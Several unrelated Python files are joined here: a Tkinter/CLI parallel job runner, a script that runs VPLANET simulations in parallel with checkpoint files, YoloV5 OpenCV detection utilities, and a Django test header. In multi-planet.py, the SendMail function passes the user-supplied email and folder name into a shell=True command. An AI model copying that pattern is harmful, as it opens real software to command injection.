The return value of job() and any output is passed to the result of the stop_callback.
        Any arguments needed for input to job() should be supplied via self.setup_kwargs using the set_args() method."""
result = 1
output = "Override this method"
return result, output
def terminate(self):
"""Child type may choose to implement this to kill the run()/job() thread."""
print("terminate() not implemented for", self.name)
class Cli:
""" The (C)ommand (L)ine (I)nterface part of the app, for when running with the GUI
is not desired."""
def __init__(self, runners):
self.runners = runners
for r in runners:
r.set_start_callback(self.call_when_runner_starts)
r.set_stop_callback(self.call_when_runner_stops)
self.result_info_list = list()
self.start_callback_sema = threading.BoundedSemaphore()
self.stop_callback_sema = threading.BoundedSemaphore()
def call_when_runner_starts(self, name):
with self.start_callback_sema:
print(name, "starting...")
def call_when_runner_stops(self, name, result_message, output):
with self.stop_callback_sema:
print(name, "finished.")
self.result_info_list.append((name, result_message, output))
def display_result_info(self):
max_len = 0
for name, result_message, output in self.result_info_list:
max_len = max(max_len, len(name), len(result_message))
output_lines = output.split("\n")
for line in output_lines:
max_len = max(max_len, len(line))
# Don't let max_len get too long
max_len = min(max_len, 200)
separator = ""
for i in range(0, max_len + 2): # + 2 to match leading "# "
separator += "#"
for name, result_message, output in self.result_info_list:
output_lines = output.split("\n")
print("\n\n")
print(separator)
print("#", name)
print(separator)
print("# Result:", result_message)
print(separator)
for line in output_lines:
print("#", line)
def get_exit_return_code(self):
failing_jobs = list()
for name, result_message, output in self.result_info_list:
if "Success" not in result_message:
failing_jobs.append(name)
print("\n\n")
failures_detected = len(failing_jobs) > 0
if failures_detected:
print("Failing jobs:")
for job in failing_jobs:
print(" ", job)
print("\n", str(len(failing_jobs)), "job(s) failed.")
else:
print("All tests passed")
        return 1 if failures_detected else 0
def run(self):
for r in self.runners:
print(r.name, "is waiting to start...")
r.start()
for r in self.runners:
r.stop_event.wait()
self.display_result_info()
sys.exit(self.get_exit_return_code())
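# Illustrative wiring only (editor's sketch; the job names, count, and duration are
# hypothetical): build a few runners, hand them to Cli, and let run() print the results
# and set the process exit code.
def _example_cli_main():
    runners = [SleepJobRunner("sleep-job-{}".format(i)) for i in range(3)]
    for r in runners:
        r.set_args(seconds=1)
    Cli(runners).run()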
class WidgetState(Enum):
INIT, WAITING, RUNNING, DONE = range(0, 4)
class GuiProcessWidget:
"""The part of GUI that represents one of the processes
"""
def __init__(self, master, name, runner, output_file_dir=""):
self.name = name
self.runner = runner
self.state = WidgetState.INIT
self.frame = tk.Frame(master, height=self.get_height(), width=self.get_width())
self.process_enable_var = tk.IntVar()
self.process_enable_var.set(1)
self.check_button = None
self.create_check_button()
self.status_label = None
self.progress_bar = None
self.terminate_button = None
self.open_output_button = None
if output_file_dir == "":
output_file_dir = gettempdir()
self.output_file_name = output_file_dir + "/" + str(uuid.uuid4()) + ".txt" # UUID is unique
def get_tk_widget(self):
return self.frame
@staticmethod
def get_height():
return 40
@staticmethod
def get_width():
return 400
def create_check_button(self):
self.check_button = tk.Checkbutton(self.frame, text=self.name, variable=self.process_enable_var)
if self.process_enable_var.get():
self.check_button.select()
else:
self.check_button.deselect()
self.check_button.grid(row=0, column=0, sticky=tk.NSEW)
def get_name(self):
return self.name
def select(self):
if self.check_button is not None:
self.check_button.select()
def deselect(self):
if self.check_button is not None:
self.check_button.deselect()
def toggle(self):
if self.check_button is not None:
self.check_button.toggle()
def make_status_label(self, text, **kwargs):
if self.status_label is not None:
self.status_label.destroy()
self.status_label = tk.Label(self.frame, text=text, **kwargs)
self.status_label.grid(row=0, column=0, sticky=tk.NSEW)
def poll_done(self):
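        # Widget state machine: start() moves INIT -> WAITING (or straight to DONE when the
        # process is deselected); polling here advances WAITING -> RUNNING once the runner
        # thread reports running, and WAITING/RUNNING -> DONE once the runner has stopped.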
if self.state == WidgetState.WAITING and self.runner.running:
self.state = WidgetState.RUNNING
self.transition_to_running()
elif (self.state == WidgetState.WAITING and self.runner.stop_event.is_set()) \
or (self.state == WidgetState.RUNNING and not self.runner.running):
self.state = WidgetState.DONE
self.transition_to_done()
return self.state == WidgetState.DONE
def create_terminate_button(self):
self.terminate_button = tk.Button(self.frame, text="Terminate", command=self.terminate_action)
self.terminate_button.grid(row=0, column=3, sticky=tk.NE)
def create_open_output_button(self):
self.open_output_button = tk.Button(self.frame, text="Open Output", command=self.open_output_action)
self.open_output_button.grid(row=0, column=1, sticky=tk.NE)
def transition_to_done(self):
self.destroy_progress_bar()
self.destroy_terminate_button()
text = self.name + ": " + self.runner.result_message
color = 'black'
if "FAIL" in self.runner.result_message:
color = 'red'
if "Success" in self.runner.result_message:
color = '#006400' # Dark Green
self.write_output_to_file(text + "\n" + self.runner.output)
self.make_status_label(text, fg=color)
self.create_open_output_button()
def transition_to_running(self):
text = self.name + ": Running..."
self.make_status_label(text)
self.create_and_animate_progress_bar()
self.create_terminate_button()
def create_and_animate_progress_bar(self):
self.progress_bar = ttk.Progressbar(self.frame, orient=tk.HORIZONTAL, mode="indeterminate")
self.progress_bar.grid(row=0, column=1, sticky=tk.NE)
self.progress_bar.start()
def transition_to_not_selected(self):
self.destroy_status_label()
self.destroy_progress_bar()
self.destroy_terminate_button()
self.destroy_open_output_button()
self.make_status_label(self.name + ": Not Selected")
def transition_to_waiting_to_start(self):
self.destroy_status_label()
self.destroy_progress_bar()
self.destroy_terminate_button()
self.destroy_open_output_button()
self.make_status_label(self.name + ": Waiting to start...")
self.runner.start()
def start(self):
started = False
self.check_button.destroy()
self.check_button = None
if self.process_enable_var.get():
started = True
self.state = WidgetState.WAITING
self.transition_to_waiting_to_start()
else:
self.state = WidgetState.DONE
self.transition_to_not_selected()
return started
def write_output_to_file(self, output):
with open(self.output_file_name, 'w') as output_file:
output_file.write(output)
def open_output_action(self):
webbrowser.open('file://' + self.output_file_name)
def terminate_action(self):
self.runner.terminate()
def reset(self):
self.state = WidgetState.INIT
self.destroy_checkbutton()
self.destroy_status_label()
self.destroy_progress_bar()
self.destroy_terminate_button()
self.destroy_open_output_button()
self.clean_up_files()
self.create_check_button()
def destroy_open_output_button(self):
if self.open_output_button is not None:
self.open_output_button.destroy()
self.open_output_button = None
def destroy_terminate_button(self):
if self.terminate_button is not None:
self.terminate_button.destroy()
self.terminate_button = None
def destroy_progress_bar(self):
if self.progress_bar is not None:
self.progress_bar.stop()
self.progress_bar.destroy()
self.progress_bar = None
def destroy_status_label(self):
if self.status_label is not None:
self.status_label.destroy()
self.status_label = None
def destroy_checkbutton(self):
if self.check_button is not None:
self.check_button.destroy()
self.check_button = None
def clean_up_files(self):
if os.path.isfile(self.output_file_name):
os.remove(self.output_file_name)
class Gui:
"""Main window of the GUI. Contains GuiProcessWidgets.
"""
def __init__(self, application_title, runners, output_file_dir=""):
self.application_title = application_title
self.runners = runners
self.root = Gui.build_root(application_title)
self.main_frame = Gui.build_main_frame(self.root)
self.filter_text_entry = None # Forward declare this before registering filter_text_update_callback
self.upper_controls_frame, \
self.select_all_button, \
self.select_none_button, \
self.select_inv_button, \
self.filter_text_string_var, \
self.filter_text_entry = Gui.build_upper_controls_frame(self.main_frame,
self.select_all, self.select_none, self.select_inv,
self.filter_text_update_callback)
num_procs_to_show = 15
self.process_canvas, \
self.h_bar, \
self.v_bar, \
self.process_widgets = Gui.build_process_canvas(self.main_frame,
GuiProcessWidget.get_width(),
GuiProcessWidget.get_height() * num_procs_to_show,
runners,
output_file_dir)
self.lower_controls_frame, \
self.exit_button, \
self.go_button = Gui.build_lower_controls_frame(self.main_frame, self.exit_action, self.go_action)
self.reset_button = None
self.root.protocol("WM_DELETE_WINDOW", self.wm_delete_window_action) # Covers Alt+F4
self.root.bind("<Control-q>", self.keyboard_exit_key_combination)
self.root.bind("<Escape>", self.keyboard_exit_key_combination)
self.root.bind("<Return>", self.keyboard_return_key)
self.root.bind("<Alt-o>", self.keyboard_alt_o_combination)
@staticmethod
def build_root(application_title):
root = tk.Tk()
root.title(application_title)
Gui.configure_expansion(root, 0, 0)
return root
@staticmethod
def build_main_frame(root):
main_frame = tk.Frame(root)
main_frame.grid(row=0, column=0, sticky=tk.NSEW)
Gui.configure_expansion(main_frame, 1, 0)
return main_frame
@staticmethod
def build_upper_controls_frame(master, select_all_method, select_none_method, select_inv_method,
filter_callback):
upr_ctl_frm = tk.Frame(master)
upr_ctl_frm.grid(row=0, column=0, columnspan=2, sticky=tk.NSEW)
Gui.configure_column_expansion(upr_ctl_frm, 0)
Gui.configure_column_expansion(upr_ctl_frm, 1)
Gui.configure_column_expansion(upr_ctl_frm, 2)
sel_all_btn = tk.Button(upr_ctl_frm, text="Select All", command=select_all_method)
sel_none_btn = tk.Button(upr_ctl_frm, text="Select None", command=select_none_method)
sel_inv_btn = tk.Button(upr_ctl_frm, text="Invert Selection", command=select_inv_method)
filter_str = tk.StringVar()
filter_str.trace("w", lambda name, index, mode, sv=filter_str: filter_callback(sv))
filter_entry = tk.Entry(upr_ctl_frm, textvariable=filter_str)
filter_entry.insert(0, "<filter selection (regex)>")
Gui.place_in_expandable_cell(sel_all_btn, 0, 0)
Gui.place_in_expandable_cell(sel_none_btn, 0, 1)
Gui.place_in_expandable_cell(sel_inv_btn, 0, 2)
filter_entry.grid(row=1, column=0, columnspan=3, sticky=tk.NSEW)
return upr_ctl_frm, sel_all_btn, sel_none_btn, sel_inv_btn, filter_str, filter_entry
@staticmethod
def build_process_canvas(master, canvas_width, canvas_height, runners, output_file_dir):
process_canvas = tk.Canvas(master, width=canvas_width, height=canvas_height)
h_bar = tk.Scrollbar(master, orient=tk.HORIZONTAL, command=process_canvas.xview)
h_bar.grid(row=2, column=0, sticky=tk.EW)
v_bar = tk.Scrollbar(master, orient=tk.VERTICAL, command=process_canvas.yview)
v_bar.grid(row=1, column=1, sticky=tk.NS)
process_canvas.config(xscrollcommand=h_bar.set, yscrollcommand=v_bar.set)
# process_canvas.bind_all("<MouseWheel>", ...)
process_canvas.bind_all("<Button-4>", lambda event: process_canvas.yview_scroll(-1, "units"))
process_canvas.bind_all("<Button-5>", lambda event: process_canvas.yview_scroll(1, "units"))
canvas_width = 0
canvas_height = 0
process_widgets = list()
for i, r in enumerate(runners):
pw = GuiProcessWidget(process_canvas, r.name, r, output_file_dir)
process_widgets.append(pw)
pos_x = 0
pos_y = pw.get_height() * i
canvas_height += pw.get_height()
canvas_width = pw.get_width()
process_canvas.create_window(pos_x, pos_y, anchor=tk.NW, window=pw.get_tk_widget())
process_canvas.config(scrollregion=(0, 0, canvas_width, canvas_height))
Gui.place_in_expandable_cell(process_canvas, 1, 0)
return process_canvas, h_bar, v_bar, process_widgets
@staticmethod
def build_lower_controls_frame(master, exit_action, go_action):
lower_controls_frame = tk.Frame(master)
lower_controls_frame.grid(row=3, column=0, columnspan=2, sticky=tk.NSEW)
Gui.configure_column_expansion(lower_controls_frame, 0)
Gui.configure_column_expansion(lower_controls_frame, 1)
exit_button = tk.Button(lower_controls_frame, text="Exit", command=exit_action)
Gui.place_in_expandable_cell(exit_button, 0, 0)
go_button = Gui.build_go_button(lower_controls_frame, go_action)
return lower_controls_frame, exit_button, go_button
@staticmethod
def build_go_button(master, go_action):
b = tk.Button(master, text="Go", command=go_action)
Gui.place_in_expandable_cell(b, 0, 1)
return b
@staticmethod
def build_reset_button(master, reset_action):
b = tk.Button(master, text="Reset", command=reset_action)
Gui.place_in_expandable_cell(b, 0, 1)
return b
@staticmethod
def place_in_expandable_cell(thing, row, col):
thing.grid(row=row, column=col, sticky=tk.NSEW)
@staticmethod
def configure_expansion(thing, row, column):
Gui.configure_column_expansion(thing, column)
Gui.configure_row_expansion(thing, row)
@staticmethod
def configure_row_expansion(thing, row):
tk.Grid.rowconfigure(thing, row, weight=1)
@staticmethod
def configure_column_expansion(thing, column):
tk.Grid.columnconfigure(thing, column, weight=1)
def select_all(self):
for p in self.process_widgets:
p.select()
def select_none(self):
for p in self.process_widgets:
p.deselect()
def select_inv(self):
for p in self.process_widgets:
p.toggle()
def filter_text_update_callback(self, sv):
regex = sv.get()
try:
pattern = re.compile(regex)
if self.filter_text_entry is not None:
self.filter_text_entry.config(bg='white')
for p in self.process_widgets:
if pattern.search(p.get_name()):
p.select()
else:
p.deselect()
except Exception:
if self.filter_text_entry is not None:
self.filter_text_entry.config(bg='red')
def exit_action(self):
for p in self.process_widgets:
p.terminate_action()
self.clean_up_files()
self.main_frame.quit()
def go_action(self):
self.go_button.config(state=tk.DISABLED)
num_started = 0
for p in self.process_widgets:
if p.start():
num_started += 1
if num_started > 0:
self.root.after(250, self.process_widget_polling_loop)
else:
self.change_go_button_to_reset_button()
def process_widget_polling_loop(self):
if self.poll_all_widgets_done():
self.all_widgets_done_action()
else:
self.root.after(250, self.process_widget_polling_loop)
def poll_all_widgets_done(self):
all_done = True # Starts True because of the 'and' in the loop
for i, p in enumerate(self.process_widgets):
d = p.poll_done()
all_done = all_done and d
return all_done
def reset_action(self):
for p in self.process_widgets:
p.reset()
self.reset_button.destroy()
self.reset_button = None
self.go_button = Gui.build_go_button(self.lower_controls_frame, self.go_action)
def all_widgets_done_action(self):
if self.go_button is not None:
self.change_go_button_to_reset_button()
def change_go_button_to_reset_button(self):
self.go_button.destroy()
self.go_button = None
self.reset_button = Gui.build_reset_button(self.lower_controls_frame, self.reset_action)
def run(self):
self.root.mainloop()
def keyboard_exit_key_combination(self, event):
self.clean_up_files()
self.root.destroy()
def keyboard_return_key(self, event):
if self.go_button is not None:
self.go_action()
if self.reset_button is not None:
self.reset_action()
def keyboard_alt_o_combination(self, event):
for w in self.process_widgets:
if w.open_output_button is not None:
w.open_output_action()
break
def wm_delete_window_action(self):
"""Callback for when the "X" is clicked to close the window"""
self.clean_up_files() # Insert this behavior
self.root.destroy() # Continue with original behavior
def clean_up_files(self):
for p in self.process_widgets:
p.clean_up_files()
class ParallelProcRunnerAppBase:
"""A base class for the Parallel Process Runner app.
Selects between the GUI or CLI."""
def __init__(self, name, usage=None, output_file_dir=""):
self.name = name
self.output_file_dir = output_file_dir
self.opt_parser = optparse.OptionParser(usage=usage)
self.configure_default_options(self.opt_parser)
self.configure_custom_options(self.opt_parser)
(self.options, self.args) = self.opt_parser.parse_args()
def configure_default_options(self, parser):
parser.add_option("-c", "--cli", dest='gui', action='store_false',
help="use the CLI (command-line-interface), not the GUI.")
parser.add_option("-g", "--gui", dest='gui', action='store_true', default=True,
help="use the GUI (graphical-user-interface), not the CLI")
def configure_custom_options(self, parser):
"""Child may extend this"""
pass
def get_runners(self):
"""Child must implement to return an iterable containing objects that inherit from BaseJobRunner"""
return list()
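        # (See DummyRunner and ExampleApp.get_runners() near the bottom of this
        # file for a concrete implementation of this hook.)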
def run(self):
if self.options.gui:
gui = Gui(self.name, self.get_runners(), self.output_file_dir)
gui.run()
else:
cli = Cli(self.get_runners())
cli.run()
class DummyRunner(BaseJobRunner):
"""For testing the BaseJobRunner.
"""
def __init__(self, name):
super().__init__(name)
self.job_ran = False
self.terminated = False
self.job_result = -1
def job(self):
self.terminated = False
self.job_ran = False
self.setup_kwargs['job_mocking_event'].wait()
self.job_ran = True
if self.terminated:
self.terminated = False
return 255, "Job was terminated by user"
return self.job_result, "Output from " + self.name
def set_result(self, result):
self.job_result = result
def terminate(self):
self.setup_kwargs['job_mocking_event'].set()
self.terminated = True
class ExampleApp(ParallelProcRunnerAppBase):
"""For testing and demonstrating ParallelProcRunnerApp
"""
def __init__(self):
super().__init__("Test for ParallelProcRunner")
def get_runners(self):
runners = list()
for i in range(0, 5):
result = i % 2
will_fail = result != 0
name = "Process " + str(i)
if will_fail:
name += " (will fail)"
else:
name += " (will pass)"
r = DummyRunner(name)
runners.append(r)
# r.set_start_gating_event(None if i == 0 else runners[i-1].stop_event)
r.set_result(result)
class DummyEvent:
def __init__(self):
self.flag = False
def set(self):
self.flag = True
def wait(self):
i = 0
timeout = randint(5, 10)
while not self.flag and i < timeout:
sleep(1)
i += 1
self.flag = False
dummy = DummyEvent()
r.set_args(job_mocking_event=dummy)
if i > 0:
r.set_start_gating_event(runners[0].stop_event)
return runners
if __name__ == '__main__':
"""For testing"""
app = ExampleApp()
app.run()
|
multi-planet.py
|
import os
import multiprocessing as mp
import sys
import subprocess as sub
import mmap
import argparse
import h5py
import numpy as np
from bigplanet import CreateHDF5,merge_data,load,save,CreateMasterHDF5
from collections import OrderedDict
# --------------------------------------------------------------------
## parallel implementation of running vplanet over a directory ##
def parallel_run_planet(input_file, cores, quiet, bigplanet,email):
# gets the folder name with all the sims
folder_name, infiles = GetDir(input_file)
#gets the list of sims
sims = sorted([f.path for f in os.scandir(folder_name) if f.is_dir()])
    # initializes the checkpoint file
checkpoint_file = os.getcwd() + '/' + '.' + folder_name
    # checks whether the checkpoint file doesn't exist yet and, if so, creates it
if os.path.isfile(checkpoint_file) == False:
CreateCP(checkpoint_file,input_file,quiet,sims)
    # if it does exist, check for any 0's (sims that didn't complete) and
    # change them to -1 so they are re-run
else:
ReCreateCP(checkpoint_file,input_file,quiet,sims)
#get logfile name
path_vpl = os.path.join(sims[0],'vpl.in')
with open(path_vpl, 'r') as vpl:
content = [line.strip().split() for line in vpl.readlines()]
for line in content:
if line:
if line[0] == 'sSystemName':
system_name = line[1]
logfile = system_name + ".log"
lock = mp.Lock()
workers = []
for i in range(cores):
workers.append(mp.Process(target=par_worker, args=(checkpoint_file,infiles,system_name,logfile,quiet,bigplanet,lock)))
for w in workers:
w.start()
for w in workers:
w.join()
if bigplanet == True:
CreateMasterHDF5(folder_name,sims)
if email is not None:
SendMail(email, folder_name)
def SendMail(email,destfolder):
Title = "Multi-Planet has finished for " + destfolder
Body = "Please log into your computer to verify the results. This is an auto-generated message."
message = "echo " + Body + " | " + 'mail -s ' + '"'+ Title + '" ' + email
sub.Popen(message , shell=True)
def GetDir(input_file):
""" Give it input file and returns name of folder where simulations are located. """
infiles = []
# gets the folder name with all the sims
with open(input_file, 'r') as vpl:
content = [line.strip().split() for line in vpl.readlines()]
for line in content:
if line:
if line[0] == 'destfolder':
folder_name = line[1]
if line[0] == 'file':
infiles.append(line[1])
    if folder_name is None:
        print("ERROR: Name of destination folder not provided in file '%s'. "
              "Use syntax 'destfolder <foldername>'" % input_file)
        exit()
if os.path.isdir(folder_name) == False:
print("ERROR: Folder", folder_name, "does not exist in the current directory.")
exit()
return folder_name, infiles
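# A minimal sketch of the input file GetDir() parses, based only on the keys it
# reads above; the folder and file names here are hypothetical:
#
#   destfolder  my_sweep
#   file        vpl.in
#   file        earth.in
#
# 'destfolder' names the directory that holds one sub-directory per simulation,
# and each 'file' line is collected into `infiles` (used later when bigplanet
# builds the HDF5 output).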
def CreateCP(checkpoint_file,input_file,quiet,sims):
with open(checkpoint_file,'w') as cp:
cp.write('Vspace File: ' + os.getcwd() + '/' + input_file + '\n')
cp.write('Total Number of Simulations: '+ str(len(sims)) + '\n')
for f in range(len(sims)):
cp.write(sims[f] + " " + "-1 \n")
cp.write('THE END \n')
def ReCreateCP(checkpoint_file,input_file,quiet,sims):
if quiet == False:
print('WARNING: multi-planet checkpoint file already exists!')
print('Checking if checkpoint file is corrupt...')
datalist = []
with open(checkpoint_file, 'r') as f:
for newline in f:
datalist.append(newline.strip().split())
for l in datalist:
if l[1] == '0':
l[1] = '-1'
with open(checkpoint_file, 'w') as f:
for newline in datalist:
f.writelines(' '.join(newline)+'\n')
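# Illustrative layout of the checkpoint file managed by CreateCP()/ReCreateCP()
# and by par_worker() below (folder names are hypothetical). Each simulation
# line ends with a status flag: -1 = not yet run, 0 = claimed by a worker,
# 1 = finished successfully.
#
#   Vspace File: /path/to/vspace_input
#   Total Number of Simulations: 3
#   my_sweep/sim_0 -1
#   my_sweep/sim_1 0
#   my_sweep/sim_2 1
#   THE END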
## parallel worker to run vplanet ##
def par_worker(checkpoint_file,infiles,system_name,logfile,quiet,bigplanet,lock):
while True:
lock.acquire()
datalist = []
data = {}
with open(checkpoint_file, 'r') as f:
for newline in f:
datalist.append(newline.strip().split())
folder = ''
for l in datalist:
if l[1] == '-1':
folder = l[0]
l[1] = '0'
break
if not folder:
lock.release()
return
with open(checkpoint_file, 'w') as f:
for newline in datalist:
f.writelines(' '.join(newline)+'\n')
lock.release()
os.chdir(folder)
#runs vplanet on folder and writes the output to the log file
with open('vplanet_log','a+') as vplf:
vplanet = sub.Popen("vplanet vpl.in", shell=True, stdout=sub.PIPE, stderr=sub.PIPE, universal_newlines=True)
            for line in vplanet.stderr:
                vplf.write(line)
            for line in vplanet.stdout:
                vplf.write(line)
            # wait() blocks until vplanet exits and returns its real exit status;
            # poll() immediately after Popen() would still be None while vplanet runs.
            return_code = vplanet.wait()
lock.acquire()
datalist = []
with open(checkpoint_file, 'r') as f:
for newline in f:
datalist.append(newline.strip().split())
        if return_code == 0:
for l in datalist:
if l[0] == folder:
l[1] = '1'
break
if quiet == False:
print(folder, "completed")
if bigplanet == True:
single_folder = folder.split('/')[-1]
HDF5_File = single_folder + '.hdf5'
data = {}
CreateHDF5(data, system_name, infiles, logfile, quiet, HDF5_File)
else:
for l in datalist:
if l[0] == folder:
l[1] = '-1'
break
if quiet == False:
print(folder, "failed")
with open(checkpoint_file, 'w') as f:
for newline in datalist:
f.writelines(' '.join(newline)+'\n')
lock.release()
os.chdir("../../")
if __name__ == "__main__":
max_cores = mp.cpu_count()
parser = argparse.ArgumentParser(description="Using multi-processing to run a large number of simulations")
parser.add_argument("-c","--cores", type=int, default=max_cores, help="The total number of processors used")
parser.add_argument("-q","--quiet", action="store_true", help="No command line output for multi-planet")
parser.add_argument("-bp","--bigplanet", action="store_true" ,help="Runs bigplanet and creates the HDF5 files alongside running mutlt-planet")
parser.add_argument("-m","--email",type=str, help="Mails user when multi-planet is completed")
parser.add_argument("InputFile", help="name of the vspace file")
args = parser.parse_args()
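    # Example invocation (hypothetical input file name):
    #   python multi-planet.py -c 4 -bp -m user@example.com vspace.in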
try:
if sys.version_info >= (3, 0):
help = sub.getoutput("vplanet -h")
else:
help = sub.check_output(["vplanet", "-h"])
except OSError:
raise Exception("Unable to call VPLANET. Is it in your PATH?")
parallel_run_planet(args.InputFile,args.cores,args.quiet,args.bigplanet,args.email)
|
utils_v5.py
|
""""
Miscellaneous function to run OpenCV DNN YoloV5
"""
import cv2 as cv
import time
import sys
import numpy as np
class prepDetect:
"""
Variables that will have an initial values that will be updated will be created in the class"""
frame=None
conf_thresh, NMS_THRESHOLD,score_thresh=0.4, 0.4,0.25
def __init__(self, class_path, weight_onnx, INPUT_WIDTH, INPUT_HEIGHT):
self.class_path=class_path #as .txt file
self.vid_path=None
self.weight_onnx=weight_onnx #path to weight
self.INPUT_WIDTH, self.INPUT_HEIGHT = INPUT_WIDTH, INPUT_HEIGHT
self.outs=None
self.INPUT_WIDTH, self.INPUT_HEIGHT= 640,640
self.conf_thresh, self.NMS_THRESHOLD,self.score_thresh
#print(f'input w, h {self.INPUT_WIDTH, self.INPUT_HEIGHT}')
###Dataset##
def load_capture(self):
capture = cv.VideoCapture(self.vid_path)
return capture
def formatFrame(self, frame):
""" Creates a black square canvas around the frame"""
prepDetect.frame=frame
row, col, _ = prepDetect.frame.shape
_max = max(col, row)
self.frame_reshaped = np.zeros((_max, _max, 3), np.uint8)
self.frame_reshaped[0:row, 0:col] = prepDetect.frame
#print(f'resized frame shape check', self.frame_reshaped.shape)
return self.frame_reshaped
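    # Worked example of the squaring step above (sizes are illustrative): a
    # 480x640 frame (row=480, col=640) gives _max=640, so it is copied into the
    # top-left of a 640x640 black canvas and the bottom 160 rows stay black.
    # The detector then sees a square input without stretching the image.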
#####Model
def load_classes(self):
self.class_list = []
with open(self.class_path, "r") as f:
self.class_list = [cname.strip() for cname in f.readlines()]
return self.class_list
def model(self):
"""
Builds model once
"""
net = cv.dnn.readNet(self.weight_onnx)
print("Running on CPU")
net.setPreferableBackend(cv.dnn.DNN_BACKEND_OPENCV)
net.setPreferableTarget(cv.dnn.DNN_TARGET_CPU)
return net
    def detect(self, image, net):
        """ Runs one forward pass of the network on a frame.
        `image` should be the square canvas produced by formatFrame(). """
blob = cv.dnn.blobFromImage(image, 1/255.0, (self.INPUT_WIDTH, self.INPUT_HEIGHT), swapRB=True, crop=False)
net.setInput(blob)
preds = net.forward()
return preds
#######NMS
def detectNMS(self, outs, image, conf_thresh, score_thresh, nms_threshold):
""""
image is likely the resized_reshaped image
"""
self.outs=outs
prepDetect.conf_thresh, prepDetect.NMS_THRESHOLD,prepDetect.score_thresh=conf_thresh, nms_threshold, score_thresh
#print(f'cns: {prepDetect.conf_thresh, prepDetect.NMS_THRESHOLD,prepDetect.score_thresh}')
class_ids = []
confidences = []
boxes = []
#print('nms outs', len(outs))
rows = self.outs.shape[0]
        image_height, image_width, _ = image.shape  # numpy shape is (rows, cols, channels)
x_factor = image_width / self.INPUT_WIDTH
y_factor = image_height / self.INPUT_HEIGHT
for r in range(rows):
row = self.outs[r]
confidence = row[4]
if confidence >= prepDetect.conf_thresh:
classes_scores = row[5:]
_, _, _, max_indx = cv.minMaxLoc(classes_scores)
class_id = max_indx[1]
if (classes_scores[class_id] > prepDetect.score_thresh):
confidences.append(confidence)
class_ids.append(class_id)
x, y, w, h = row[0].item(), row[1].item(), row[2].item(), row[3].item()
left = int((x - 0.5 * w) * x_factor)
top = int((y - 0.5 * h) * y_factor)
width = int(w * x_factor)
height = int(h * y_factor)
box = np.array([left, top, width, height])
boxes.append(box)
#print('nms boxes', boxes)
indexes = cv.dnn.NMSBoxes(boxes, confidences, prepDetect.score_thresh, prepDetect.NMS_THRESHOLD)
#print(f'nms idx {indexes}')
result_class_ids = []
result_confidences = []
result_boxes = []
for i in indexes:
result_confidences.append(confidences[i])
result_class_ids.append(class_ids[i])
result_boxes.append(boxes[i])
return result_class_ids, result_confidences, result_boxes
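# A minimal end-to-end usage sketch for prepDetect, assuming hypothetical
# 'classes.txt' and 'yolov5s.onnx' files and a single BGR frame from OpenCV.
# The function is only defined, never called, so importing this module stays
# side-effect free; thresholds reuse the class defaults (0.4, 0.25, 0.4).
def _example_prepdetect_usage(frame):
    det = prepDetect('classes.txt', 'yolov5s.onnx', 640, 640)
    net = det.model()                # build the cv.dnn network once
    square = det.formatFrame(frame)  # pad the frame onto a square canvas
    preds = det.detect(square, net)  # raw YoloV5 output (for a COCO model, shape (1, N, 85))
    class_ids, confidences, boxes = det.detectNMS(
        preds[0], square, conf_thresh=0.4, score_thresh=0.25, nms_threshold=0.4)
    return class_ids, confidences, boxes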
##################Video Capture
import cv2, queue, threading, time
import logging
from logging.handlers import RotatingFileHandler
from logging.config import fileConfig
class VideoCapture:
r"""
This custom function creates a separate thread that caches
and clears the 'internal' buffer retained
by the cv2.VideoCapture() object.
The buffering creates about 30 seconds
lag in between frames being analyzed and imshow() plot.
Implementing this function solves that problem.
"""
def __init__(self, name):
self.name=name
self.cap = cv2.VideoCapture(self.name)
self.q = None
t = threading.Thread(target=self._reader)
t.daemon = True
t.start()
# read frames as soon as they are available, keeping only most recent one
def _reader(self):
log_file='camera_status.log'
fileConfig('./persondetectapp/src/model_data/config/config_cam_logfile.config')
logger = logging.getLogger(__name__)
##################
open_time = time.time()
self.cap.open(self.name)
logger.warning('1_cap.open() duration: {}'.format(time.time()-open_time))
##################
while True:
if not self.cap.isOpened():
self.cap.release()
time.sleep(2)
##################
open_time = time.time()
self.cap.open(self.name)
logger.warning('2_cap.open() duration: {}'.format(time.time()-open_time))
continue
else:
vid_time = time.time()
ret, frame = self.cap.read()
if not ret:
self.cap.open(self.name)
#break
continue
self.q = frame
logger.warning("1_video capture_empty queue time. {}".format(time.time()-vid_time))
#print(f'Is {self.name} camera open? : {self.cap.isOpened()}')
    def read(self):
        return self.q  # most recent frame grabbed by the reader thread (None until the first frame arrives)
# Returns the height and width of camera frame.
def framesize(self):
return [self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT), self.cap.get(cv2.CAP_PROP_FRAME_WIDTH)]
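# A short usage sketch for the threaded VideoCapture wrapper above; the RTSP
# URL is hypothetical. read() returns the most recent frame grabbed by the
# background thread (or None until the first frame arrives), so the caller
# never processes stale buffered frames. Defined only, never called here.
def _example_videocapture_usage(url="rtsp://camera.example/stream"):
    cap = VideoCapture(url)
    frame = cap.read()
    while frame is None:          # wait for the reader thread's first frame
        time.sleep(0.05)
        frame = cap.read()
    height, width = cap.framesize()
    return frame, height, width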
# Raw points are stored as a comma-delimited xi,yi sequence, not as the (x, y) pairs we need.
def coordsFormatter(path2=''):
"""
This functions seeks to convert.
example raw format is in string format:
[6,52.29,498.24,178.577,450.882,304.863] where first item is drawing style(polygon, point etc).
The rest is x,y,x,y,x,y coordinates.
This function:
Watches the working directory
Asserts the csv file exists in the right directory. Needs a single file in the dir.
Excludes the first and last two characters, then splits the string to make them eligible for numerical formating
Appends each list into a container
Subset each as tuple(x,y)
returns a list of list of coordinates as tuple(x,y)
"""
import os
import glob
import csv
data_path=glob.glob(os.path.join(path2,'*.csv'))
print('filename', data_path[0])
assert os.path.exists(data_path[0]), 'Needs the redzone region .csv file inside /rz_coords directory?'
with open(data_path[0], newline='') as csvfile:
reader = csv.DictReader(csvfile)
coords_all=[]
print('reader', reader)
for idx, row in enumerate(reader):
if idx>8:
str_coords = list(row.values())[1][-2] #subset for list of coords
listx=[float(x) for x in str_coords[1:-2].split(',')[1:]]
coords_all.append(listx)
real_coords=[]
for j in coords_all:
coords = [j[i:i + 2] for i in range(0, len(j), 2)]
real_coords.append(coords)
print('real coords', real_coords)
return real_coords
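# Worked example of the conversion above: a raw CSV cell such as
# "[6,52.29,498.24,178.577,450.882,...]" drops the leading drawing-style code
# (6), parses the remaining values as floats, and regroups them pairwise into
# [[52.29, 498.24], [178.577, 450.882], ...], i.e. one [x, y] vertex per pair
# of the red-zone polygon.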
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
